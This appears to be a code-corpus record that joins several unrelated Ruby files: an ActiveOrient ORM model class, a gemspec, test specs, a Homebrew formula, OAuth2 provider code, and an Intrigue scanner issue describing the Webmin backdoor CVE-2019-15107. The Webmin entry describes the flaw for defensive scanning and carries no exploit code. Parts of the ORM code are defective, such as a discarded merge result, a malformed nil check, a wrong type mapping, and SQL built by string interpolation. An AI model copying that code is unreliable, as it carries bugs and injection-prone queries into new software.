def orientdb_class name:, superclass: nil # :nodoc: # public method: autoload_class
ActiveOrient.database_classes[name.to_s].presence || ActiveOrient::Model
rescue NoMethodError => e
logger.error { "Error in orientdb_class: is ActiveOrient.database_classes initialized ? \n\n\n" }
logger.error{ e.backtrace.map {|l| " #{l}\n"}.join }
Kernel.exit
end
=begin
setter method to initialise a dummy ActiveOrient::Model class to enable multi-level
access to links and linklists
=end
def link_list *property
property.each do |p|
the_dummy_class = orientdb.allocate_class_in_ruby("dummy_"+p.to_s)
the_dummy_class.ref_name = ref_name + "." + p.to_s
singleton_class.send :define_method, p do
the_dummy_class
end
end
end
=begin
requires the file specified in the model-dir
In fact, the model-files are loaded instead of required.
Thus, even after recreation of a class (Class.delete_class, ORD.create_class classname)
custom methods declared in the model files are present.
If a class is destroyed (i.e. the database class is deleted), the ruby-class and its methods vanish, too.
The directory specified is expanded by the namespace. The parameter itself is the base-dir.
Example:
Namespace: HC
model_dir : 'lib/model'
searched directory: 'lib/model/hc'
ActiveOrient::Model.modeldir is aimed to be set to the application dir. It may be a String, Pathname or
an array of strings or pathnames.
The parameter `dir` is used internally and by gems to ensure that basic methods are loaded first.
=end
def require_model_file dir = nil
logger.progname = 'ModelClass#RequireModelFile'
# model-dir can either be a string or an array of string or pathnames
default = [ActiveOrient::Model.model_dir].flatten
# access the default dir's first
the_directories = case dir
when String, Pathname
default.present? ? [dir] + default : [dir]
when Array
default.present? ? dir + default : dir
else
default.present? ? default : []
end.uniq.compact
the_directories.uniq.map do |raw_directory|
the_directory = Pathname( raw_directory )
if File.exists?( the_directory )
model= self.to_s.underscore + ".rb"
filename = the_directory + model
if File.exists?(filename )
if load filename
logger.debug{ "#{filename} sucessfully loaded" }
self #return_value
else
logger.error{ "#{filename} load error" }
nil #return_value
end
else
logger.debug{ "model-file not present: #{filename} --> skipping" }
nil #return_value
end
else
logger.error{ "Directory #{ the_directory } not present " }
nil #return_value
end
end.compact.present? # return true only if at least one model-file is present
rescue TypeError => e
puts "THE CLASS#require_model_file -> TypeError: #{e.message}"
puts "Working on #{self.to_s} -> #{self.superclass}"
puts "Class_hierarchy: #{orientdb.class_hierarchy.inspect}."
print e.backtrace.join("\n")
raise
#
end
# creates an inherent class
def create_class *c
orientdb.create_class( *c ){ self }
end
########## CREATE ############
=begin
Universal method to create a new record.
It's overloaded to create specific kinds, eg. edge and vertex and is called only for abstract classes
Example:
V.create_class :test
Test.create string_attribute: 'a string', symbol_attribute: :a_symbol, array_attribute: [34,45,67]
Test.create link_attribute: Test.create( :a_new_attribute => 'new' )
=end
def create **attributes
attributes.merge :created_at => DateTime.new
result = db.create_record self, attributes: attributes
if result.nil
logger.error('Model::Class'){ "Table #{refname}: create failed: #{attributes.inspect}" }
elsif block_given?
yield result
else
result # return value
end
end
# returns a OrientSupport::OrientQuery
def query **args
OrientSupport::OrientQuery.new( **( {from: self}.merge args))
end
=begin
Creates or updates records.
Parameter:
- set: A hash of attributes to insert or update unconditionally
- where: A string or hash as condition which should return just one record.
The where-part should be covered with an unique-index.
returns the affected record, if the where-condition is set properly.
Otherwise upsert acts as »update« and returns all updated records (as array).
=end
def upsert set: nil, where: , **args
set = where if set.nil?
query( **args.merge( kind: :upsert, set: set, where: where )).execute(reduce: true){|y| y[:$current].reload!}
end
=begin
Sets a value to certain attributes, overwrites existing entries, creates new attributes if necessary
returns the count of affected records
IB::Account.update connected: false
IB::Account.update where: "account containsText 'F'", set:{ connected: false }
# or
IB::Account.update connected: false, where: "account containsText 'F'"
=end
def update! where: nil , set: {}, **arg
query( kind: :update!, set: set.merge(arg), where: where).execute(reduce: true){|y| y[:count]}
end
alias update_all update!
# same as update!, but returns a list of updated records
def update where: , set: {}, **arg
# In OrientDB V.3 the database only returns the affected rid's
# We have to update the contents manually, this is done in the execute-block
query( kind: :update, set: set.merge(arg), where: where).execute{|y| y[:$current].reload!}
end
=begin
Create a Property in the Schema of the Class and optionally create an automatic index
Examples:
create_property :customer_id, type: :integer, index: :unique
create_property( :name, type: :string ) { :unique }
create_property( :name, type: :string ) { name: 'some_index', on: :automatic, type: :unique }
create_property :in, type: :link, linked_class: V (used by edges)
:call-seq: create_property(field (required),
type: :a_supported_type',
linked_class: nil
supported types:
:bool :double :datetime = :date :float :decimal
:embedded_list = :list :embedded_map = :map :embedded_set = :set
:int :integer :link_list :link_map :link_set
If `:list`, `:map`, `:set`, `:link`, `:link_list`, `:link_map` or `:link_set` is specified
a `linked_class:` parameter can be specified. Argument is the OrientDB-Class-Constant
=end
def create_property field, type: :integer, index: nil, **args
arguments = args.values.map do |y|
if y.is_a?(Class) && ActiveOrient.database_classes.values.include?(y)
y.ref_name
elsif ActiveOrient.database_classes.keys.include?(y.to_s)
y
else
puts ActiveOrient.database_classes.inspect
puts "YY : #{y.to_s} #{y.class}"
raise ArgumentError , "database class #{y.to_s} not allocated"
end
end.compact.join(',')
supported_types = {
:bool => "BOOLEAN",
:double => "BYTE",
:datetime => "DATE",
:date => "DATE",
:float => "FLOAT",
:decimal => "DECIMAL",
:embedded_list => "EMBEDDEDLIST",
:list => "EMBEDDEDLIST",
:embedded_map => "EMBEDDEDMAP",
:map => "EMBEDDEDMAP",
:embedded_set => "EMBEDDEDSET",
:set => "EMBEDDEDSET",
:string => "STRING",
:int => "INTEGER",
:integer => "INTEGER",
:link => "LINK",
:link_list => "LINKLIST",
:link_map => "LINKMAP",
:link_set => "LINKSET",
}
## if the »type« argument is a string, it is used unchanged
type = supported_types[type] if type.is_a?(Symbol)
raise ArgumentError , "unsupported type" if type.nil?
s= " CREATE PROPERTY #{ref_name}.#{field} #{type} #{arguments}"
puts s
db.execute { s }
i = block_given? ? yield : index
## supported format of block: index: { name: 'something' , on: :automatic, type: :unique }
## or { name: 'something' , on: :automatic, type: :unique } #
## or { some_name: :unique } # manual index
## or { :unique } # automatic index
if i.is_a? Hash
att= i.key( :index ) ? i.values.first : i
name, on, type = if att.size == 1 && att[:type].nil?
[att.keys.first, field, att.values.first ]
else
[ att[:name] || field , att[:on] || field , att[:type] || :unique ]
end
create_index( name , on: on, type: type)
elsif i.is_a?(Symbol) || i.is_a?(String)
create_index field, type: i
end
# orientdb.create_property self, field, **keyword_arguments, &b
end
# Create more Properties in the Schema of the Class
def create_properties argument_hash, &b
orientdb.create_properties self, argument_hash, &b
end
# Add an Index
#
# Parameters:
# name (string / symbol),
# [ on: :automatic / single Column, Array of Columns,
# [ type: :unique, :nonunique, :dictionary,:fulltext, {other supported index-types} ]]
#
# Default:
# on: :automatic
# type: :unique
#
# Example
#
# ORD.create_vertex_class :pagination
# Pagination.create_property :col1 , type: :string
# Pagination.create_property :col2, type: :integer
# Pagination.create_property :col3, type: :string
# Pagination.create_property :col4, type: :integer
# Pagination.create_index :composite, :on => [:col1, :col2, :col3], type: 'dictionary'
def create_index name, **attributes
orientdb.create_index self, name: name, **attributes
end
# list all Indexes
def indexes
properties[:indexes]
end
def migrate_property property, to: , linked_class: nil, via: 'tzr983'
if linked_class.nil?
create_property via, type: to
else
create_property via, type: to, linked_class: linked_class
end
# my_count = query.kind(:update!).set( "#{via} = #{property} ").execute(reduce: true){|c| c[:count]}
# logger.info{" migrate property: #{count} records prosessed"}
all.each{ |r| r.update set:{ via => r[property.to_sym] }}
nullify = query.kind(:update!).set( property: nil ).execute(reduce: true){|c| c[:count]}
# raise "migrate property: count of erased items( #{nullify} differs from total count (#{my_count}) " if nullify != my_count
db.execute{" alter property #{ref_name}.#{via} name '#{property}' "}
logger.info{ "successfully migrated #{property} to #{:to} " }
end
########## GET ###############
def classname # :nodoc: #
ref_name
end
# get elements by rid
def get rid
if @excluded.blank?
db.get_record(rid)
else
db.execute{ "select expand( @this.exclude( #{@excluded.map(&:to_or).join(",")})) from #{rid} "}
end
end
# get all the elements of the class
def all
query.execute
end
# get the first element of the class
def first **args
query( **( { order: "@rid" , limit: 1 }.merge args)).execute(reduce: true)
end
# db.get_records(from: self, where: where, limit: 1).pop
#end
# get the last element of the class
def last **args
query( **( { order: {"@rid" => 'desc'} , limit: 1 }.merge args)).execute(reduce: true)
end
# Used to count of the elements in the class
#
# Examples
# TestClass.count where: 'last_access is NULL' # only records where 'last_access' is not set
# TestClass.count # all records
def count **args
query( **( { projection: 'COUNT(*)' }.merge args )).execute(reduce: true){|x| x[:"COUNT(*)"]}
end
# Get the properties of the class
def properties
object = orientdb.get_class_properties self
{:properties => object['properties'], :indexes => object['indexes']}
end
alias get_class_properties properties
# Print the properties of the class
def print_properties
orientdb.print_class_properties self
end
=begin
»GetRecords« uses the REST-Interface to query the database. The alternative »QueryDatabase« submits
the query via Execute.
Both methods rely on OrientSupport::OrientQuery and its capacity to support complex query-builds.
The method requires a hash of arguments. The following keys are supported:
*projection:*
SQL-Queries use »select« to specify a projection (ie. `select sum(a), b+5 as z from class where ...`)
In ruby »select« is a method of enumeration. To specify what to »select« from in the query-string
we use »projection«, which accepts different arguments
projection: a_string --> inserts the sting as it appears
projection: an OrientSupport::OrientQuery-Object --> performs a sub-query and uses the result for further querying though the given parameters.
projection: [a, b, c] --> "a, b, c" (inserts a comma-separated list)
projection: {a: b, "sum(x)" => f} --> "a as b, sum(x) as f" (renames properties and uses functions)
*distinct:*
Constructs a query like »select distinct(property) [as property] from ...«
distinct: :property --> the result is mapped to the property »distinct«.
distinct: [:property] --> the result replaces the property
distinct: {property: :some_name} --> the result is mapped to ModelInstance.some_name
*order:*
Sorts the result-set. If new properties were introduced via select:, distinct: etc. Sorting takes place on these properties
order: :property {property: asc, property: desc}[property, property, .. ](orderdirection is 'asc')
Further supported Parameter:
group_by
skip
limit
unwind
see orientdb- documentation (https://orientdb.com/docs/last/SQL-Query.html)
*query:*
Instead of providing the parameter to »get_records«, a OrientSupport::OrientQuery can build and
tested prior to the method-call. The OrientQuery-Object is then provided with the query-parameter. I.e.
q = OrientSupport::OrientQuery.new
ORD.create_class :test_model
q.from TestModel
q.where {name: 'Thomas'}
count = TestModel.count query: q
q.limit 10
0.step(count,10) do |x|
q.skip = x
puts TestModel.get_documents(query: q).map{|x| x.adress }.join('\t')
end
prints a Table with 10 columns.
=end
def get_records **args
db.get_records(from: self, **args){self}
end
alias get_documents get_records
=begin
Performs a query on the Class and returns an Array of ActiveOrient:Model-Records.
Fall-back method, is overloaded by Vertex.where
Is aliased by »custom_where»
Example:
Log.where priority: 'high'
--> submitted database-request: query/hc_database/sql/select from Log where priority = 'high'/-1
=> [ #<Log:0x0000000480f7d8 @metadata={ ... }, ...
Multiple arguments are joined via "and" eg:
Aktie.where symbol: 'TSL, exchange: 'ASX'
---> select from aktie where symbol = 'TLS' and exchange = 'ASX'
=end
def where *attributes
q= OrientSupport::OrientQuery.new where: attributes
query_database( q)
end
alias custom_where where
=begin
QueryDatabase sends the Query directly to the database.
The query returns a hash if a result set is expected
select {something} as {result} (...)
leads to
[ { :{result} => {result of query} } ]
It can be modified further by passing a block, ie.
q = OrientSupport::OrientQuery.new( from: :base )
.projection( 'first_list[5].second_list[9] as second_list' )
.where( label: 9 )
q.to_s => 'select first_list[5].second_list[9] as second_list from base where label = 9 '
second_list = Base.query_database( q ){|x| x[:second_list]}.first
The query returns (a list of) documents of type ActiveOrient::Model if a document is queried i.e.
q = OrientSupport::OrientQuery.new from: :base
q.projection 'expand( first_list[5].second_list[9])' #note: no 'as' statement
result2 = Base.query_database( q ).first
=> #<SecondList:0x000000000284e840 @metadata={}, @d=nil, @attributes={:zobel=>9, "@class"=>"second_list"}>
query_database is used on model-level and submits
select (...) from class
#query performs queries on the instance-level and submits
select (...) from #{a}:{b}
=end
def query_database query, set_from: true
# note: the parameter is not used anymore
query.from self if query.is_a?(OrientSupport::OrientQuery) && query.from.nil?
result = db.execute{ query.to_s }
result = if block_given?
result.is_a?(Array) ? result.map{|x| yield(x) } : yield(result)
else
result
end
if result.is_a? Array
OrientSupport::Array.new work_on: self, work_with: result
else
result
end # return value
end
########### DELETE ###############
# Delete a property from the class
def delete_property field
orientdb.delete_property self, field
end
# Delete record(s) specified by their rid's
def delete_record *rid
db.delete_record rid
end
alias delete_document delete_record
# Query the database and delete the records of the resultset
#
# Returns the count of datasets effected
def delete_records where: {} , **args
if args[:all] == true
where = {}
else
where.merge!(args) if where.is_a?(Hash)
return 0 if where.empty?
end
orientdb.delete_records( self, where: where ).count
end
alias delete delete_records
##################### EXPERIMENT #################
=begin
Suppose that you created a graph where vertexes month is connected with
the vertexes day by the edge TIMEOF.
Suppose we want to find all the days in the first month and in the third month..
Usually we can do in the following way.
ORD.create_class :month
(.. put some records into Month ... )
firstmonth = Month.first
thirdmonth = Month.all[2]
days_firstmonth = firstmonth.out_TIMEOF.map{|x| x.in}
days_thirdmonth = thirdmonth.out_TIMEOF.map{|x| x.in}
However we can obtain the same result with the following command
Month.add_edge_link name: "days", direction: "out", edge: TIME_OF
firstmonth = month.first
thirdmonth = month.all[2]
days_firstmonth = firstmonth.days
days_thirdmonth = thirdmonth.days
To get their value you can do:
thirdmonth.days.value
=end
def add_edge_link name:, direction: :out, edge:
dir = direction.to_s == "out" ? :out : :in
define_method(name.to_sym) do
return self["#{dir}_#{edge.classname}"].map{|x| x["in"]}
end
end
=begin
See http://orientdb.com/docs/2.1/SQL-Alter-Property.html
=end
def alter_property property, attribute: "DEFAULT", alteration: # :nodoc:
orientdb.alter_property self, property: property, attribute: attribute, alteration: alteration
end
end
| 30.364742 | 147 | 0.670871 |
bb50ce58658ccf310fdc73192d16db73a362ca64 | 1,294 | # -*- encoding: utf-8 -*-
# stub: jekyll-theme-leap-day 0.1.0 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-theme-leap-day".freeze
s.version = "0.1.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Matt Graham".freeze, "GitHub, Inc.".freeze]
s.date = "2017-08-14"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/pages-themes/leap-day".freeze
s.licenses = ["CC0-1.0".freeze]
s.rubygems_version = "2.6.13".freeze
s.summary = "Leap Day is a Jekyll theme for GitHub Pages".freeze
s.installed_by_version = "2.6.13" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
else
s.add_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
end
else
s.add_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
end
end
| 36.971429 | 112 | 0.661515 |
e989283cc3dc76d650c360e2f65f63d219e45fd1 | 565 | require 'spec_helper'
describe 'Private zone' do
let(:private_domain_name) { vars.private_domain_name }
subject { route53_hosted_zone("#{private_domain_name}.") }
it { should exist }
it 'outputs the zone id' do
expect(subject.id).to(include(output_for(:harness, 'private_zone_id')))
end
it 'outputs the name servers' do
expected_name_servers =
output_for(:harness, 'private_zone_name_servers')
.join("\n")
expect(subject)
.to(have_record_set(subject.name)
.ns(expected_name_servers))
end
end | 24.565217 | 75 | 0.679646 |
91bb64b75fa0522623c0b97a10bdb55fddc915bc | 3,844 | And(/^I wait to see Droplet text mode$/) do
wait = Selenium::WebDriver::Wait.new(timeout: 10)
wait.until {@browser.execute_script("return parseInt($('.droplet-ace').css('left')) > 0;")}
end
And(/^I wait to see Droplet block mode$/) do
wait = Selenium::WebDriver::Wait.new(timeout: 10)
wait.until {@browser.execute_script("return $('.droplet-gutter > div').css('display') === 'block';")}
end
And(/^the Droplet ACE text is "([^"]*)"$/) do |expected_text|
# Let us expect newlines in the editor
expected_text.gsub! '\n', "\n"
actual_text = @browser.execute_script("return __TestInterface.getDropletContents();")
expect(actual_text).to eq(expected_text)
end
And(/^the Droplet ACE text is '([^']*)'$/) do |expected_text|
# Let us expect newlines in the editor
expected_text.gsub! '\n', "\n"
actual_text = @browser.execute_script("return __TestInterface.getDropletContents();")
expect(actual_text).to eq(expected_text)
end
And(/^no Tooltipster tooltip is visible$/) do
wait = Selenium::WebDriver::Wait.new(timeout: 10)
wait.until {[email protected]_script("return $('.tooltipster-base').is(':visible');")}
end
And(/^there is a Tooltipster tooltip with text "([^"]*)"$/) do |tooltip_text|
wait = Selenium::WebDriver::Wait.new(timeout: 10)
wait.until {@browser.execute_script("return $('.tooltipster-content :contains(#{tooltip_text})').length > 0;")}
end
# This doesn't work in IE or on mobile yet, not sure why.
When /^I drag droplet block "([^"]*)" to line (\d+)$/ do |block_name, line_number|
# Droplet with SVG will trash the block if any part of it overlaps the gutter.
extra_dx = 5
code = %{
var block = $(".droplet-palette-canvas text:contains(#{block_name})");
var gutterLine = $(".droplet-gutter-line").filter(function (index) { return $(this).text() === "#{line_number}"; });
var drag_dx = gutterLine.offset().left + gutterLine.outerWidth() - block.offset().left + #{extra_dx};
var drag_dy = gutterLine.offset().top - block.offset().top;
block.simulate('drag', {
handle: 'center',
dx: drag_dx,
dy: drag_dy,
moves: 5
});
}
@browser.execute_script code
end
When /^I click droplet gutter line (\d+)$/ do |line|
code = %{
var gutterLine = $(".droplet-gutter-line").filter(function (index) { return $(this).text() === "#{line}"; });
var x = gutterLine.offset().left + 5;
var y = gutterLine.offset().top + 5;
gutterLine.simulate('mousedown', {
clientX: x,
clientY: y,
});
}
@browser.execute_script code
end
When /^I ensure droplet is in text mode$/ do
steps 'And I wait to see "#show-code-header"'
button_text = @browser.execute_script("return $('#show-code-header').text()")
if button_text == 'Show Text'
steps <<-STEPS
Then I press "show-code-header"
And I wait to see Droplet text mode
STEPS
end
end
When /^I ensure droplet is in block mode$/ do
steps 'And I wait to see "#show-code-header"'
button_text = @browser.execute_script("return $('#show-code-header').text()")
if button_text == 'Show Blocks'
steps <<-STEPS
Then I press "show-code-header"
And I wait to see Droplet block mode
STEPS
end
end
When /^I add code "([^"]+)" to ace editor$/ do |code|
steps 'I ensure droplet is in text mode'
add_code_to_editor(code)
end
def add_code_to_editor(code)
script =
"var aceEditor = __TestInterface.getDroplet().aceEditor;\n" \
"aceEditor.textInput.focus();\n" \
"aceEditor.onTextInput(\"#{code}\");\n"
@browser.execute_script(script)
end
When /^ace editor code is equal to "([^"]+)"$/ do |expected_code|
actual_code = get_ace_editor_code
expect(actual_code).to eq(expected_code)
end
def get_ace_editor_code
script = 'return __TestInterface.getDroplet().aceEditor.getValue().trim();'
@browser.execute_script(script)
end
| 33.719298 | 120 | 0.668054 |
014c556c2b1391bee28ae84e9b16163cd6557bcd | 751 | Rails.application.routes.draw do
mount Rswag::Ui::Engine => '/api-docs'
mount Rswag::Api::Engine => '/api-docs'
devise_for :users
root "users#index"
resources :users, only: [:index, :show] do
resources :posts, only: [:index, :show, :destroy] do
resources :comments, only: [:create, :destroy]
resources :likes, only: [:create]
end
end
resources :posts, only: [:new, :create]
namespace "api", defaults: { format: :json } do
post 'login', to: 'authentication#authenticate'
post 'signup', to: 'users#create'
resources :users, only:[:index, :show, :create] do
resources :posts, only:[:index, :show] do
resources :comments, only:[:index, :create]
end
end
end
end
| 30.04 | 56 | 0.617843 |
39b1a8b274499c32ca02afd2e503d73ce01bb0c4 | 2,139 | class Libsvm < Formula
desc "Library for support vector machines"
homepage "https://www.csie.ntu.edu.tw/~cjlin/libsvm/"
# Upstream deletes old downloads, so we need to mirror it ourselves
url "https://www.csie.ntu.edu.tw/~cjlin/libsvm/libsvm-3.24.tar.gz"
mirror "https://dl.bintray.com/homebrew/mirror/libsvm-3.24.tar.gz"
sha256 "d5881a201a4e6227bf8e2f5de7d6eeaef481c6c2bb9540aeca547737844f8696"
license "BSD-3-Clause"
livecheck do
url :homepage
regex(/The current release \(Version v?(\d+(?:\.\d+)+)[, )]/i)
end
bottle do
cellar :any
sha256 "da8cea69e489c678a06f28ba6032a8f3f8f899ac344741bd4b1090da8e33eafe" => :big_sur
sha256 "8dded17ad2e22342ae25d392d5e4d9776572f8b5081e62064e97c027f8c481e6" => :catalina
sha256 "4db9a3e77edfda475ca8bdcad82ce1443ed50df41b28b59d726b1fa81944e2c7" => :mojave
sha256 "5d4ee9cec3a0048ef8abd328022fa3752c3dc2ead9d86d9995b79558700dbbd2" => :high_sierra
sha256 "93892583011e9379e0378425f9b4be778919cb4df18c7b46a59903208732bf5e" => :x86_64_linux
end
def install
system "make", "CFLAGS=#{ENV.cflags} -fPIC"
system "make", "lib"
bin.install "svm-scale", "svm-train", "svm-predict"
if OS.mac?
lib.install "libsvm.so.2" => "libsvm.2.dylib"
lib.install_symlink "libsvm.2.dylib" => "libsvm.dylib"
MachO::Tools.change_dylib_id("#{lib}/libsvm.2.dylib", "#{lib}/libsvm.2.dylib")
else
lib.install "libsvm.so.2"
lib.install_symlink "libsvm.so.2" => "libsvm.so"
end
include.install "svm.h"
end
test do
(testpath/"train_classification.txt").write <<~EOS
+1 201:1.2 3148:1.8 3983:1 4882:1
-1 874:0.3 3652:1.1 3963:1 6179:1
+1 1168:1.2 3318:1.2 3938:1.8 4481:1
+1 350:1 3082:1.5 3965:1 6122:0.2
-1 99:1 3057:1 3957:1 5838:0.3
EOS
(testpath/"train_regression.txt").write <<~EOS
0.23 201:1.2 3148:1.8 3983:1 4882:1
0.33 874:0.3 3652:1.1 3963:1 6179:1
-0.12 1168:1.2 3318:1.2 3938:1.8 4481:1
EOS
system "#{bin}/svm-train", "-s", "0", "train_classification.txt"
system "#{bin}/svm-train", "-s", "3", "train_regression.txt"
end
end
| 36.254237 | 94 | 0.684432 |
2822914265d760360b50121e591d990d557920f3 | 1,134 | module Intrigue
module Issue
class VulnerableWebminInstall < BaseIssue
def self.generate(instance_details={})
{
name: "vulnerability_webmin_cve_2019_15107",
pretty_name: "Vulnerable Webmin Password Reset (CVE-2019-15107)",
identifiers: [
{ type: "CVE", name: "CVE-2019-15107" }
],
severity: 1,
status: "potential",
category: "vulnerability",
description: "The vulnerability was secretly planted by an unknown hacker who successfully managed to inject a BACKDOOR at some point in its build infrastructure that surprisingly persisted into various releases of Webmin (1.882 through 1.921) and eventually remained hidden for over a year.",
remediation: "Update the webmin installation",
affected_software: [
{ :vendor => "Webmin", :product => "Webmin"},
],
references: [
{ type: "description", uri: "https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html" } ,
],
}.merge!(instance_details)
end
end
end
end
| 35.4375 | 301 | 0.641975 |
e25f7f8d02645fe547d826540933ba91029fe6d7 | 395 | cask :v1 => 'the-unarchiver' do
version '3.9.1'
sha256 '4911c332df7f4bb23877652700e845fe097b793ae37450948319398009e923a3'
# googlecode.com is the official download host per the vendor homepage
url "https://theunarchiver.googlecode.com/files/TheUnarchiver#{version}_legacy.zip"
name 'The Unarchiver'
homepage 'http://unarchiver.c3.cx/'
license :oss
app 'The Unarchiver.app'
end
| 30.384615 | 85 | 0.767089 |
082b77772f7368d86c356c91299aef46a6ff6aae | 363 | require "bundler/setup"
require "top/ico"
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 24.2 | 66 | 0.749311 |
edc00f7bde5498705a2d5ec5668fbb77c70cfab9 | 3,972 | require 'base64'
require 'bcrypt'
require 'cgi'
require 'digest/sha1'
require 'json'
require 'logger'
require 'rack'
begin
require 'securerandom'
rescue LoadError
end
module Songkick
module OAuth2
ROOT = File.expand_path(File.dirname(__FILE__) + '/..')
TOKEN_SIZE = 160
autoload :Model, ROOT + '/oauth2/model'
autoload :Router, ROOT + '/oauth2/router'
autoload :Schema, ROOT + '/oauth2/schema'
def self.random_string
if defined? SecureRandom
SecureRandom.hex(TOKEN_SIZE / 8).to_i(16).to_s(36)
else
rand(2 ** TOKEN_SIZE).to_s(36)
end
end
def self.generate_id(&predicate)
id = random_string
id = random_string until predicate.call(id)
id
end
def self.hashify(token)
return nil unless String === token
Digest::SHA1.hexdigest(token)
end
ACCESS_TOKEN = 'access_token'
ASSERTION = 'assertion'
ASSERTION_TYPE = 'assertion_type'
AUTHORIZATION_CODE = 'authorization_code'
CLIENT_ID = 'client_id'
CLIENT_SECRET = 'client_secret'
CODE = 'code'
CODE_AND_TOKEN = 'code_and_token'
DURATION = 'duration'
ERROR = 'error'
ERROR_DESCRIPTION = 'error_description'
EXPIRES_IN = 'expires_in'
GRANT_TYPE = 'grant_type'
OAUTH_TOKEN = 'oauth_token'
PASSWORD = 'password'
REDIRECT_URI = 'redirect_uri'
REFRESH_TOKEN = 'refresh_token'
RESPONSE_TYPE = 'response_type'
SCOPE = 'scope'
STATE = 'state'
TOKEN = 'token'
USERNAME = 'username'
INVALID_REQUEST = 'invalid_request'
UNSUPPORTED_RESPONSE = 'unsupported_response_type'
REDIRECT_MISMATCH = 'redirect_uri_mismatch'
UNSUPPORTED_GRANT_TYPE = 'unsupported_grant_type'
INVALID_GRANT = 'invalid_grant'
INVALID_CLIENT = 'invalid_client'
UNAUTHORIZED_CLIENT = 'unauthorized_client'
INVALID_SCOPE = 'invalid_scope'
INVALID_TOKEN = 'invalid_token'
EXPIRED_TOKEN = 'expired_token'
INSUFFICIENT_SCOPE = 'insufficient_scope'
ACCESS_DENIED = 'access_denied'
class Provider
EXPIRY_TIME = 3600
autoload :Authorization, ROOT + '/oauth2/provider/authorization'
autoload :Exchange, ROOT + '/oauth2/provider/exchange'
autoload :AccessToken, ROOT + '/oauth2/provider/access_token'
autoload :Error, ROOT + '/oauth2/provider/error'
class << self
attr_accessor :realm, :enforce_ssl
end
def self.clear_assertion_handlers!
@password_handler = nil
@assertion_handlers = {}
@assertion_filters = []
end
clear_assertion_handlers!
def self.handle_passwords(&block)
@password_handler = block
end
def self.handle_password(client, username, password, scopes)
return nil unless @password_handler
@password_handler.call(client, username, password, scopes)
end
def self.filter_assertions(&filter)
@assertion_filters.push(filter)
end
def self.handle_assertions(assertion_type, &handler)
@assertion_handlers[assertion_type] = handler
end
def self.handle_assertion(client, assertion, scopes)
return nil unless @assertion_filters.all? { |f| f.call(client) }
handler = @assertion_handlers[assertion.type]
handler ? handler.call(client, assertion.value, scopes) : nil
end
def self.parse(*args)
Router.parse(*args)
end
def self.access_token(*args)
Router.access_token(*args)
end
def self.access_token_from_request(*args)
Router.access_token_from_request(*args)
end
end
end
end
| 28.992701 | 72 | 0.611531 |
016f263c75f5e64f4fe4ed40708759c5cc360d3e | 205 | require File.dirname(__FILE__) + '/../test_helper'
class UserTest < ActiveSupport::TestCase
def test_create
User.create(:username => 'tuxedo', :name => 'Mr. Tuxedo', :password =>'cat')
end
end
| 22.777778 | 80 | 0.673171 |
1c73081e7abe1473c60b7454a8e4c85dafb72e32 | 4,336 | RSpec.shared_examples 'a bucket' do |features|
features ||= {}
before do
subject.write '/a/b.txt', 'TESTDATA-b'
subject.write 'a/b/c.txt', 'TESTDATA-c',
content_type: 'text/plain',
metadata: { 'meta-KEY' => 'VaLuE' }
subject.write 'a/b/c/d.txt', 'TESTDATA-d'
subject.write 'a/b/c/d/e.txt', 'TESTDATA-e'
end
def be_recent_time
be_within(90).of(Time.now)
end
after do
subject.close
end
it 'lists' do
expect(subject.ls).to be_a(Enumerator)
expect(subject.ls.to_a).to match_array [
'a/b.txt',
'a/b/c.txt',
'a/b/c/d.txt',
'a/b/c/d/e.txt',
]
expect(subject.ls('**/c*').to_a).to match_array [
'a/b/c.txt',
]
expect(subject.ls('a/b/*/*').to_a).to match_array [
'a/b/c/d.txt',
]
expect(subject.ls('x/**').to_a).to be_empty
end
it 'globs' do
expect(subject.glob).to be_a(Enumerator)
expect(subject.glob.to_a.sort_by(&:path)).to match [
include(path: 'a/b.txt', size: 10, mtime: be_recent_time),
include(path: 'a/b/c.txt', size: 10, mtime: be_recent_time),
include(path: 'a/b/c/d.txt', size: 10, mtime: be_recent_time),
include(path: 'a/b/c/d/e.txt', size: 10, mtime: be_recent_time),
]
expect(subject.glob('**/c*').to_a).to match [
include(path: 'a/b/c.txt', size: 10, mtime: be_recent_time),
]
expect(subject.glob('a/b/*/*').to_a).to match [
include(path: 'a/b/c/d.txt', size: 10, mtime: be_recent_time),
]
expect(subject.glob('x/**').to_a).to be_empty
end
it 'returns info' do
info = subject.info('/a/b/c.txt')
expect(info.path).to eq('a/b/c.txt')
expect(info.size).to eq(10)
expect(info.mtime).to be_recent_time
expect(info.content_type).to eq('text/plain') unless features[:content_type] == false
expect(info.metadata).to eq('Meta-Key' => 'VaLuE') unless features[:metadata] == false
expect { subject.info('missing.txt') }.to raise_error(BFS::FileNotFound)
expect { subject.info('/a/b') }.to raise_error(BFS::FileNotFound)
end
it 'write/reads' do
expect(subject.read('a/b.txt')).to eq('TESTDATA-b')
expect(subject.read('/a/b.txt')).to eq('TESTDATA-b')
subject.write('a/b.txt', 'NEWDATA')
data = subject.read('a/b.txt')
expect(data).to eq('NEWDATA')
expect(data.encoding).to eq(Encoding.default_external)
end
it 'write/reads (block)' do
subject.create('x.txt') {|io| io.write 'DATA-x' }
read = nil
subject.open('x.txt') {|io| read = io.gets }
expect(read).to eq('DATA-x')
end
it 'write/reads (iterative)' do
w = subject.create('y.txt')
w.write('DATA-y')
w.commit
r = subject.open('y.txt')
expect(r.read).to eq('DATA-y')
r.close
end
it 'write/reads (custom encoding + perm)' do
w = subject.create('y.txt', encoding: 'iso-8859-15', perm: 0o644)
w.write('DATA-y')
w.commit
r = subject.open('y.txt', encoding: 'iso-8859-15')
data = r.read
